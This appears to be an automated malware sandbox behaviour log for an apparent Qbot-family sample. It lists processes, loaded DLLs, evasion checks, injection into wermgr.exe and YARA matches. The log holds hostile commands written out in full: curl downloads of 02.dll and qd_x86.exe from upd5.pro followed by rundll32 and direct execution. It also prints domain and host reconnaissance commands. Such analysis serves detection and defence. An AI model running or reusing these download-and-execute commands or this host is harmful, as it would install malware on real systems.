Source: C:\Windows\System32\qwinsta.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -o 02.dll https://upd5.pro/update/02.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe 02.dll,checkit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\qd_x86.exe qd_x86.exe
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\System32\wermgr.exe
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\whoami.exe whoami /all
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\qwinsta.exe qwinsta
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\qd_x86.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\qd_x86.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\qd_x86.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\qd_x86.exe Section loaded: samcli.dll
Source: C:\Users\user\Desktop\qd_x86.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\qd_x86.exe Section loaded: logoncli.dll
Source: C:\Users\user\Desktop\qd_x86.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\qd_x86.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\qd_x86.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\qd_x86.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\qd_x86.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\qd_x86.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\qd_x86.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\whoami.exe Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\qwinsta.exe Section loaded: winsta.dll
Source: C:\Windows\System32\qwinsta.exe Section loaded: utildll.dll
Source: C:\Windows\System32\qwinsta.exe Section loaded: samcli.dll
Source: C:\Windows\System32\qwinsta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll
Source: Binary string: conhost.pdbUGP source: 02.dll.2.dr
Source: Binary string: Z:\j\projects\qbot4\Release\Win32\qd_x86.pdb source: qd_x86.exe, 00000008.00000000.1799435968.0000000000DC8000.00000002.00000001.01000000.00000006.sdmp, qd_x86.exe, 00000008.00000002.1800368210.0000000000DC8000.00000002.00000001.01000000.00000006.sdmp, qd_x86.exe.5.dr
Source: Binary string: C:\testing3\data\bdnc\BDNIMBUS-3071711\BDNIMBUS\bin\release\bdnc.pdb source: rundll32.exe, 00000003.00000002.1739313508.0000000180252000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: conhost.pdb source: 02.dll.2.dr
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004FBF0 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary, 3_2_000000018004FBF0
Source: 02.dll.2.dr Static PE information: section name: .didat
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898475C501 push rsp; ret 3_2_000001898475C50B
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000189847595F7 push rdx; ret 3_2_00000189847595F8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984759983 push 7E2E5DE3h; iretd 3_2_0000018984759989
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984755A7A push 3A22A9C9h; retf 3_2_0000018984755A87
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898475AB9D push rsp; ret 3_2_000001898475ABC4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000189847244D4 push ebx; iretd 3_2_00000189847244DD
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001898472634A push cs; retn 0000h 3_2_0000018984726386
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000018984724458 push ebx; iretd 3_2_00000189847244DD
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000189847239DD push ds; ret 3_2_00000189847239E5
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00DB4D3B push ecx; ret 8_2_00DB4D4E
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D66EC0 push ecx; ret 8_2_00D66ED3

Persistence and Installation Behavior

Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\curl.exe File created: C:\Users\user\Desktop\qd_x86.exe
Source: C:\Windows\System32\curl.exe File created: C:\Users\user\Desktop\02.dll

Boot Survival

Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\whoami.exe whoami /all
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\whoami.exe whoami /all
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wermgr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\rundll32.exe File Queried: C:\INTERNAL\__empty
Source: C:\Windows\System32\wermgr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_PhysicalMemory
Source: C:\Windows\System32\wermgr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status from Win32_PnPEntity
Source: C:\Windows\System32\wermgr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDrive
Source: C:\Windows\System32\wermgr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_PhysicalMemory
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: C:\Windows\System32\wermgr.exe Window / User API: threadDelayed 1182
Source: C:\Users\user\Desktop\qd_x86.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\rundll32.exe API coverage: 2.3 %
Source: C:\Windows\System32\rundll32.exe TID: 6808 Thread sleep count: 184 > 30
Source: C:\Windows\System32\wermgr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_Bios
Source: C:\Windows\System32\wermgr.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D98074 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 8_2_00D98074
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D64540 GetSystemInfo, 8_2_00D64540
Source: curl.exe, 00000005.00000003.1757684017.000001B929403000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAAS
Source: curl.exe, 00000002.00000003.1705495023.0000014861385000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK0[P
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001802432BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00000001802432BC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018004FBF0 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary, 3_2_000000018004FBF0
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D9D5EA GetProcessHeap, 8_2_00D9D5EA
Source: C:\Windows\System32\whoami.exe Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe Process token adjusted: Debug
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001802432BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00000001802432BC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180227ED0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0000000180227ED0
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D922A5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00D922A5
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D66C0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00D66C0A
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D66DA0 SetUnhandledExceptionFilter, 8_2_00D66DA0
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D672F7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00D672F7

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe Memory allocated: C:\Windows\System32\wermgr.exe base: 22090C90000 protect: page execute and read and write
Source: C:\Windows\System32\rundll32.exe Memory allocated: C:\Windows\System32\wermgr.exe base: 22090CC0000 protect: page read and write
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\System32\wermgr.exe base: 22090C90000 value starts with: 4D5A
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\System32\wermgr.exe base: 22090CC0000
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\System32\wermgr.exe base: 22090C90000
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\System32\wermgr.exe base: 7FF783FA6590
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -o 02.dll https://upd5.pro/update/02.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe 02.dll,checkit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\qd_x86.exe qd_x86.exe
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\System32\wermgr.exe
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\whoami.exe whoami /all
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\qwinsta.exe qwinsta
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D67109 cpuid 8_2_00D67109
Source: C:\Users\user\Desktop\qd_x86.exe Code function: EnumSystemLocalesW, 8_2_00D92779
Source: C:\Users\user\Desktop\qd_x86.exe Code function: EnumSystemLocalesW, 8_2_00D928E6
Source: C:\Users\user\Desktop\qd_x86.exe Code function: EnumSystemLocalesW, 8_2_00D92918
Source: C:\Users\user\Desktop\qd_x86.exe Code function: EnumSystemLocalesW, 8_2_00D9CCD6
Source: C:\Users\user\Desktop\qd_x86.exe Code function: EnumSystemLocalesW, 8_2_00D9CC6B
Source: C:\Users\user\Desktop\qd_x86.exe Code function: EnumSystemLocalesW, 8_2_00D9CC6D
Source: C:\Users\user\Desktop\qd_x86.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 8_2_00D9CDFC
Source: C:\Users\user\Desktop\qd_x86.exe Code function: EnumSystemLocalesW, 8_2_00D9CD71
Source: C:\Users\user\Desktop\qd_x86.exe Code function: GetLocaleInfoW, 8_2_00D9D04F
Source: C:\Users\user\Desktop\qd_x86.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 8_2_00D9D178
Source: C:\Users\user\Desktop\qd_x86.exe Code function: GetLocaleInfoW, 8_2_00D9325F
Source: C:\Users\user\Desktop\qd_x86.exe Code function: GetLocaleInfoW, 8_2_00D9D27E
Source: C:\Users\user\Desktop\qd_x86.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 8_2_00D9D354
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wermgr.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wermgr.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\qd_x86.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\qd_x86.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D613B0 CreateNamedPipeA,ConnectNamedPipe,GetLastError,ReadFile,GetLastError,DisconnectNamedPipe, 8_2_00D613B0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800744F0 GetProcAddress,GetSystemTimeAsFileTime, 3_2_00000001800744F0
Source: C:\Users\user\Desktop\qd_x86.exe Code function: 8_2_00D61AD0 GetFileAttributesW,GetModuleHandleA,GetUserNameW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcmpW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,Sleep,lstrlenA, 8_2_00D61AD0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000000180061840 GetVersion,RegOpenKeyExA,GetLastError,RegOpenKeyExA,GetLastError,RegCloseKey,RegCloseKey,RegOpenKeyExA,GetLastError,RegCloseKey, 3_2_0000000180061840
Source: C:\Windows\System32\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\wermgr.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 3.2.rundll32.exe.1898470060d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1740122551.0000018984731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1740081515.0000018984700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 3.2.rundll32.exe.1898470280d.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.18984734000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1898470280d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1898470060d.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.18984734000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1898470060d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1740153839.0000018984734000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1740300202.00000189849C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1740238507.0000018984761000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1740081515.0000018984700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 3.2.rundll32.exe.1898470060d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1740122551.0000018984731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1740081515.0000018984700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 3.2.rundll32.exe.1898470280d.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.18984734000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1898470280d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1898470060d.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.18984734000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1898470060d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.1740153839.0000018984734000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1740300202.00000189849C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1740238507.0000018984761000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1740081515.0000018984700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000000018007BAC0 bind,WSAGetLastError,WSAGetLastError, 3_2_000000018007BAC0